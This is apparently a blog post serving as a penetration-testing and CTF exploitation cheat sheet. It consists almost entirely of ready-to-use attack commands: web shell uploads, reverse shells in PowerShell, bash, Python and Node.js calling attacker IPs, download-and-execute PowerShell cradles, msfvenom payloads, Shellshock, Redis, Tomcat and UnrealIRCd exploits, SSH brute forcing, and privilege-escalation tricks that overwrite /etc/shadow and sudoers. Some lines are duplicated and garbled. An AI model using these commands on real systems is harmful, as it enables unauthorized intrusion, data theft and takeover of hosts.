Skip to main content

Exploitation

By 


CTF --> Pawnable.kr

1) Binary Exploitation Basics

2) Binary Exploit  

3) Online Hash Decrypter -- NTLM/WPA/PDF..

4) XSS Payloads 
Put a file using CURL

curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php 

Brute Force SSH:


patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0

https://github.com/lanjelot/patator.git
Brute Forcing id_rsa using JohnTheRipper:

sshng2john id_rsa
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod +x id_rsa

ssh -i id_rsa bhanu@10.10.10.10 
Bruteforcing using Hashcat:
 hashcat --example-hashes    //Gives out all the hashes list, select the mode and use it after -m
cewl 10.10.10.46 > wordlist.txt  --> Create a Word list based 

          on the files/words/links available in the web page
Windows Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Windows Payload: metasploit 

msfvenom -a x86 --platform windows -p CMD="powershell \"IEX (New-Object Net.Webclient).DownloadString('http://SERVER/script.ps1')\"" -e x86/unicode_mixed lhost=10.10.10.74 lport=9001 -b '----------------------payload-------------' BufferRegister=EAX -f python 
Upload a Shell to the Target:

powershell.exe -exec bypass -Command “& {Import-Module .\script.ps1; Invoke-CMDLET | Out-File -Encoding ascii file.txt}


or 


powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://HOST/script.ps1’); Invoke-CMDLET | Out-File -Encoding ascii file.txt“

Example
Drupal Exploit
-> Exploit-DB ; also find modified in /root/Downloads/exploits/drupal < 7.58  < 8.3.9 < 8.4.6  < 8.5.1


1) Run the exploit

2) go to website.com/bhanu.php?cmd=whoami

3) http://wensite.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile -                       //Get Reverse Shell 
Brute Forcing ZIP Files:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt something.zip
Working with Python Console 

import os
os.popen("whoami").read()

os.popen("find /etc | grep iptables").read()    //Check for accessible ports to connect via reverse shell
os.popen("base64 -w 0 /etc/iptables/rules.v4").read()      //Read Files as Base64; Check the accessible ports 

os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read()     //UDP Reverse Shell

nc -u -nvlp 1234   //Get a UDP Shell 
Exploiting Apache Tomcat:

http://IP_ADDRESS:8080/manager/html/

login with default credentials --> tomcat/tomcat

upload a war file as a reverse shell

For Windows: msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tomcat.war


For Linux: msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tom.war


Extract the war file --> look for some_random_name.jsp

nc -nvlp 9001

http://IP_ADDRESS:8080/tom/some_random_name.jsp

Get you reverse shell on nc :) 


Method-II

#Creating a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war > shell.war

#Uploading shell using curl
curl -u 'tomcat':'PASSWORD' -T shell.war 'http://10.10.10.10:8080/manager/text/deploy?path=/shells'

#List files
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/manager/text/list

#Running the Reverse Shell
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/shells/


Method -III

tomcatWarDeployer.py -U tomcat -P tomcat -H KALI_IP -p PORT 10.10.10.10:8080



Tomcat Exploit < 9.0.31 
Path Traversal: https://10.10.10.10/manager/status/..;/html


Kibana Local File Inclusion < 6.4.3 & 5.6.13
upload a Node JS Reverse shell via elastic search or any other method, then 

Node JS Reverse Shell:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js


https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/  
Exploiting Web.config: You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. 

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.6:8001/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%> 
Exploiting MongoDB - HTB Node

find creds in app.js 
example: mongodb://usernameLpassword@localhost:port/.......=DEFAULT&authSource=databasename';


mongo -p -u username DBName

db.TableName.insert({"cmd" : "cp /bin/dash /tmp/file; chmod 6755 /bin/dash;chmod u+s /tmp/file"})           //Creating SUID 
db.TableName.find() 

/tmp/ippsec -p                   //run with privs

Exploiting Haraka < 2.8.9

Exploit --> Available Here

Change the port number if required on line 123

 ./haraka.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross
htb -m redcrossn/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.h


Exploiting a CGI-bin Vulnerability : Shell Shock:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
  
Exploiting Redis sever

ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h 10.10.10.10 -p 6379
redis-cli -h 10.10.10.10 -p 6379 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -p 6379 -x set crackit
redis-cli -h 10.10.10.10 -p 6379 

config get dir 
config set dir /var/lib/redis/.ssh/
config set dbfilename “authorized_keys”
save
Exploiting UnRealIRCd  

ncat 10.10.10.117 8067         /IRC channel opens
PASS somepass
NICK somenickname
USER username hostname servername :realname    /we can see IRC server talking tp us 

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.4/9002 0>&1'" | nc 10.10.10.117 8067            /in a new terminal

ncat -lvnp 9001             /shell opens
pspy for Solaris
#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo args -o pid)

while true; do
        new_process=$(ps -eo args -o pid)
        diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] | grep -v "ps -eo args"
        sleep .1
        old_process=$new_process
done
Exploiting PlaySMS 1.4 - Exploit 

Get login creds and login 

go to http://192.168.227.140/SecreTSMSgatwayLogin/index.php?app=main&inc=feature_sendfromfile&op=list 

Create the payload: Save the payload as exploit & upload it 
<?php system('echo "bash -i >& /dev/tcp/192.168.227.135/443 0>&1"> /tmp/shell'); ?>,2,3


edit the exploit & Upload The exploit again
<?php system('chmod +x /tmp/shell'); ?>,2,3

edit the exploit & Upload The exploit again
<?php system('bash -c /tmp/shell'); ?>,2,3


Get the shell on nc -nvlp 443
Python Functions for Pentest:

scandir("/home")

file_get_contents("/root/root.txt")

file_put_contents("/root/root.txt","Enter whatever you want to paste in rootl.txt - you can even append data to it by adding FILE_APPEND",FILE_APPEND)
 
wpscan -u http://website.com --enumerate t --enumerate p  

     --> enumerate username and password in Wordpress Site

wpscan u http://10.10.10.46 --username UserName --wordlist /root/Desktop/list.txt

                    --> bruteforce a wps username with passwords list
use exploit/unix/webapp/wp_admin_shell_upload 

-->this can be used to upload a shell when you know username and password
if Find has SETUID; this command changes the root password to 1234

find . -exec sed -Ei ‘s/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/’ /etc/shadow \;





su root 
1234

 
SeImpersonatePrivilege or SeCreateGlobalPrivilege Enabled Exploit

JUICY Potato Exploit 
 
64-bit   x86 Version   Get CLSID

jp86.exe -l 1336 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

Worked for Windows 7 Professional --> 
{6d18ad12-bde3-4393-b311-099c346e6df9} 
SeLoadDriverPrivilege Enabled


need a driver, download it on the target machine Capecom.sys 

Download the exploit https://github.com/TarlogicSecurity/EoPLoadDriver/ & Execute it 

https://github.com/tandasat/ExploitCapcom  --> Download the exploit 

creae a file with a reverseshell 
nc.exe 10.10.10.10 9001 -e cmd.exe > shel.bat

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService Capcom.sys

.\ExploitCapcom 

If Perl got Root Permissions:

sudo /usr/bin/perl -e 'exec "/bin/sh"'
Get Root Using Openssl which got capabilities: Read root files

getcap openssl     /This should be "ep"

openssl enc -in "/etc/passwd" 

openssl enc -in "/root/root.txt"


Getting a shell using Openssl

./openssl enc -in /etc/sudoers > sudoers

vi sudoers                      /add the below line in sudoers file. after root all(all) all
Username  ALL=(ALL)  ALL    

cat ./sudoers | ./openssl enc -out /etc/sudoers

SSH: no matching key exchange method found:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more